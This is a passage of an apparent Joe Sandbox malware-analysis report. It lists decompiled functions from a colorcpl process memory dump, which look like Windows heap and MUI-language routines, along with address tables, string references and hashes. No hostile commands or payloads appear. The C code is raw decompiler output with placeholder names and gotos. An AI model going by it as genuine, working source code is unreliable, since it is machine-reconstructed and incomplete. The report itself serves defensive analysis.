                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E23D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 96%
                                                                                                			E06E23D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E06E21B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E06E21B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E06E21B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E06E21B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E06E21B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L06E34620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E06E5F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E06E61370(_t276, 0x6df4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E06E5BB40(0,  &_v68, _t170);
									if(L06E243C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E06E5BB40(_t257,  &_v68, _t243);
								if(L06E243C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E06E61370(_t278, 0x6df4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L06E34620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E06E5F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E06E61370(_v16, 0x6df4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E06E5BB40(_t262,  &_v68, _t244);
								if(L06E243C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E06E61370(_t282, 0x6df4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E06E5BB40(_t262,  &_v68, _t201);
							if(L06E243C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L06E34620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E06E5F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E06E61370(_t280, 0x6df4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E06E5BB40(_t267,  &_v68, _t245);
							if(L06E243C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E06E61370(_t284, 0x6df4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E06E5BB40(_t267,  &_v68, _t224);
						if(L06E243C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                                                                0x06e23d3c
                                                                                                0x06e23d42
                                                                                                0x06e23d44
                                                                                                0x06e23d46
                                                                                                0x06e23d49
                                                                                                0x06e23d4c
                                                                                                0x06e23d4f
                                                                                                0x06e23d52
                                                                                                0x06e23d55
                                                                                                0x06e23d58
                                                                                                0x06e23d5b
                                                                                                0x06e23d5f
                                                                                                0x06e23d61
                                                                                                0x06e23d66
                                                                                                0x06e78213
                                                                                                0x06e78218
                                                                                                0x06e24085
                                                                                                0x06e24088
                                                                                                0x06e2408e
                                                                                                0x06e24094
                                                                                                0x06e2409a
                                                                                                0x06e240a0
                                                                                                0x06e240a6
                                                                                                0x06e240a9
                                                                                                0x06e240af
                                                                                                0x06e240b6
                                                                                                0x06e240bd
                                                                                                0x06e240bd
                                                                                                0x06e23d83
                                                                                                0x06e7821f
                                                                                                0x06e78229
                                                                                                0x06e78238
                                                                                                0x06e78238
                                                                                                0x06e7823d
                                                                                                0x06e7823d
                                                                                                0x06e23da0
                                                                                                0x06e23daf
                                                                                                0x06e23db5
                                                                                                0x06e23dba
                                                                                                0x06e23dba
                                                                                                0x06e23dd4
                                                                                                0x06e23e94
                                                                                                0x06e23eab
                                                                                                0x06e23f6d
                                                                                                0x06e23f84
                                                                                                0x06e2406b
                                                                                                0x06e2406b
                                                                                                0x06e2406e
                                                                                                0x06e2406e
                                                                                                0x06e24070
                                                                                                0x06e24074
                                                                                                0x06e78351
                                                                                                0x06e78351
                                                                                                0x06e2407a
                                                                                                0x06e2407f
                                                                                                0x06e7835d
                                                                                                0x06e78370
                                                                                                0x06e78377
                                                                                                0x06e78379
                                                                                                0x06e7837c
                                                                                                0x06e7837c
                                                                                                0x06e7835d
                                                                                                0x00000000
                                                                                                0x06e2407f
                                                                                                0x06e23f8a
                                                                                                0x06e23f8d
                                                                                                0x06e23f90
                                                                                                0x06e23f95
                                                                                                0x06e7830d
                                                                                                0x06e7830f
                                                                                                0x06e23f9b
                                                                                                0x06e23fac
                                                                                                0x06e23fae
                                                                                                0x06e23fb1
                                                                                                0x06e23fb1
                                                                                                0x06e23fb6
                                                                                                0x06e78317
                                                                                                0x06e7831a
                                                                                                0x00000000
                                                                                                0x06e23fbc
                                                                                                0x06e23fc1
                                                                                                0x06e23fc9
                                                                                                0x06e23fd7
                                                                                                0x06e23fda
                                                                                                0x06e23fdd
                                                                                                0x06e24021
                                                                                                0x06e24021
                                                                                                0x06e24029
                                                                                                0x06e24030
                                                                                                0x06e24044
                                                                                                0x06e24046
                                                                                                0x06e24046
                                                                                                0x06e24044
                                                                                                0x06e24049
                                                                                                0x06e78327
                                                                                                0x06e78334
                                                                                                0x06e78339
                                                                                                0x06e7833c
                                                                                                0x06e2404f
                                                                                                0x06e2404f
                                                                                                0x06e2404f
                                                                                                0x06e24051
                                                                                                0x06e24056
                                                                                                0x06e24063
                                                                                                0x06e24063
                                                                                                0x06e24068
                                                                                                0x00000000
                                                                                                0x06e24068
                                                                                                0x06e23fdf
                                                                                                0x06e23fe2
                                                                                                0x06e23fe4
                                                                                                0x06e23fe7
                                                                                                0x06e23fef
                                                                                                0x06e24003
                                                                                                0x06e24005
                                                                                                0x06e24005
                                                                                                0x06e2400c
                                                                                                0x06e24013
                                                                                                0x06e24016
                                                                                                0x06e24017
                                                                                                0x06e2401b
                                                                                                0x06e2401e
                                                                                                0x00000000
                                                                                                0x06e2401e
                                                                                                0x06e23fb6
                                                                                                0x06e23eb1
                                                                                                0x06e23eb4
                                                                                                0x06e23eb7
                                                                                                0x06e23ebc
                                                                                                0x06e782a9
                                                                                                0x06e782ab
                                                                                                0x06e23ec2
                                                                                                0x06e23ed3
                                                                                                0x06e23ed5
                                                                                                0x06e23ed8
                                                                                                0x06e23ed8
                                                                                                0x06e23edd
                                                                                                0x06e782b3
                                                                                                0x06e782b6
                                                                                                0x00000000
                                                                                                0x06e23ee3
                                                                                                0x06e23ee8
                                                                                                0x06e23eed
                                                                                                0x06e23ef0
                                                                                                0x06e23ef3
                                                                                                0x06e23f02
                                                                                                0x06e23f05
                                                                                                0x06e23f08
                                                                                                0x06e782c0
                                                                                                0x06e782c3
                                                                                                0x06e782c5
                                                                                                0x06e782c8
                                                                                                0x06e782d0
                                                                                                0x06e782e4
                                                                                                0x06e782e6
                                                                                                0x06e782e6
                                                                                                0x06e782ed
                                                                                                0x06e782f4
                                                                                                0x06e782f7
                                                                                                0x06e782f8
                                                                                                0x06e782fc
                                                                                                0x06e782ff
                                                                                                0x06e782ff
                                                                                                0x06e23f0e
                                                                                                0x06e23f11
                                                                                                0x06e23f16
                                                                                                0x06e23f1d
                                                                                                0x06e23f31
                                                                                                0x06e78307
                                                                                                0x06e78307
                                                                                                0x06e23f31
                                                                                                0x06e23f39
                                                                                                0x06e23f48
                                                                                                0x06e23f4d
                                                                                                0x06e23f50
                                                                                                0x06e23f50
                                                                                                0x06e23f53
                                                                                                0x06e23f58
                                                                                                0x06e23f65
                                                                                                0x06e23f65
                                                                                                0x06e23f6a
                                                                                                0x00000000
                                                                                                0x06e23f6a
                                                                                                0x06e23edd
                                                                                                0x06e23dda
                                                                                                0x06e23ddd
                                                                                                0x06e23de0
                                                                                                0x06e23de5
                                                                                                0x06e78245
                                                                                                0x06e23deb
                                                                                                0x06e23df7
                                                                                                0x06e23dfc
                                                                                                0x06e23dfe
                                                                                                0x06e23e01
                                                                                                0x06e23e01
                                                                                                0x06e23e06
                                                                                                0x06e7824d
                                                                                                0x06e7824f
                                                                                                0x06e78254
                                                                                                0x00000000
                                                                                                0x06e23e0c
                                                                                                0x06e23e11
                                                                                                0x06e23e16
                                                                                                0x06e23e19
                                                                                                0x06e23e29
                                                                                                0x06e23e2c
                                                                                                0x06e23e2f
                                                                                                0x06e7825c
                                                                                                0x06e7825f
                                                                                                0x06e78261
                                                                                                0x06e78264
                                                                                                0x06e7826c
                                                                                                0x06e78280
                                                                                                0x06e78282
                                                                                                0x06e78282
                                                                                                0x06e78289
                                                                                                0x06e78290
                                                                                                0x06e78293
                                                                                                0x06e78294
                                                                                                0x06e78298
                                                                                                0x06e7829b
                                                                                                0x06e7829b
                                                                                                0x06e23e35
                                                                                                0x06e23e38
                                                                                                0x06e23e3d
                                                                                                0x06e23e44
                                                                                                0x06e23e58
                                                                                                0x06e782a3
                                                                                                0x06e782a3
                                                                                                0x06e23e58
                                                                                                0x06e23e60
                                                                                                0x06e23e6f
                                                                                                0x06e23e74
                                                                                                0x06e23e77
                                                                                                0x06e23e77
                                                                                                0x06e23e7a
                                                                                                0x06e23e7f
                                                                                                0x06e23e8c
                                                                                                0x06e23e8c
                                                                                                0x06e23e91
                                                                                                0x00000000
                                                                                                0x06e23e91

                                                                                                Strings
                                                                                                • WindowsExcludedProcs, xrefs: 06E23D6F
                                                                                                • Kernel-MUI-Language-Allowed, xrefs: 06E23DC0
                                                                                                • Kernel-MUI-Language-Disallowed, xrefs: 06E23E97
                                                                                                • Kernel-MUI-Number-Allowed, xrefs: 06E23D8C
                                                                                                • Kernel-MUI-Language-SKU, xrefs: 06E23F70
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                • API String ID: 0-258546922
                                                                                                • Opcode ID: 2b806920ea8e01b53a5fcd21de43b2ec1c7732aea145053984fca5a9c1f2e045
                                                                                                • Instruction ID: f20fd3fd5aa86836b79c8891a3aec74a7f4cbcf9992b41371bf0cc7e45e3137f
                                                                                                • Opcode Fuzzy Hash: 2b806920ea8e01b53a5fcd21de43b2ec1c7732aea145053984fca5a9c1f2e045
                                                                                                • Instruction Fuzzy Hash: B0F14B72D10729EFCB91DF98C9849EFBBBEFF08650F15106AE915A7250E6349E01CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E140E1 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 29%
                                                                                                			E06E140E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E06E1B150();
					} else {
						E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E06E1B150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E06E1B150(", passed to %s", _t29);
					}
					_push("\n");
					E06E1B150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x6f06378 = 1;
						asm("int3");
						 *0x6f06378 = 0;
					}
					return 0;
				}
				return 1;
			}





                                                                                                0x06e140e6
                                                                                                0x06e140e8
                                                                                                0x06e140f1
                                                                                                0x06e7042d
                                                                                                0x06e7044c
                                                                                                0x06e70451
                                                                                                0x06e7042f
                                                                                                0x06e70444
                                                                                                0x06e70449
                                                                                                0x06e7045d
                                                                                                0x06e70466
                                                                                                0x06e7046e
                                                                                                0x06e70474
                                                                                                0x06e70475
                                                                                                0x06e7047a
                                                                                                0x06e7048a
                                                                                                0x06e7048c
                                                                                                0x06e70493
                                                                                                0x06e70494
                                                                                                0x06e70494
                                                                                                0x00000000
                                                                                                0x06e7049b
                                                                                                0x00000000

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                                                                                • API String ID: 0-188067316
                                                                                                • Opcode ID: a989d65ae8a021ec2c21e9349ca97aae9a0c74b4a8d87f514b08ee94476d83c3
                                                                                                • Instruction ID: e117f7e1ba513224ef6623a989f46084df5c72c28ebecfe1cc339cdeb17b7091
                                                                                                • Opcode Fuzzy Hash: a989d65ae8a021ec2c21e9349ca97aae9a0c74b4a8d87f514b08ee94476d83c3
                                                                                                • Instruction Fuzzy Hash: 31014C726203C0BEE3F59764E80EF9377E8DB05B30F1A9029F1044BB40DAA4D449E251
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E3A830 Relevance: 5.4, Strings: 4, Instructions: 350COMMONCrypto
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 70%
                                                                                                			E06E3A830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0x6f08748 - 1;
					if( *0x6f08748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E06E1B150();
									_t260 = _t257 + 4;
								} else {
									E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E06E1B150();
								_t257 = _t260 + 4;
								__eflags =  *0x6f07bc8;
								if(__eflags == 0) {
									E06ED2073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E06EDA80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E06E6D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E06E3AB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E06EDA80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E06EDA80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0x6f08748 - 1;
					if( *0x6f08748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E06E1B150();
							} else {
								E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E06E1B150();
							__eflags =  *0x6f07bc8;
							if(__eflags == 0) {
								_t131 = E06ED2073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}























































                                                                                                0x06e3a83a
                                                                                                0x06e3a83c
                                                                                                0x06e3a83e
                                                                                                0x06e3a841
                                                                                                0x06e3a844
                                                                                                0x06e3a84a
                                                                                                0x06e3aa53
                                                                                                0x06e3aa59
                                                                                                0x06e3aa59
                                                                                                0x06e3a858
                                                                                                0x06e3a85e
                                                                                                0x06e3aaf5
                                                                                                0x06e3aafc
                                                                                                0x06e8229e
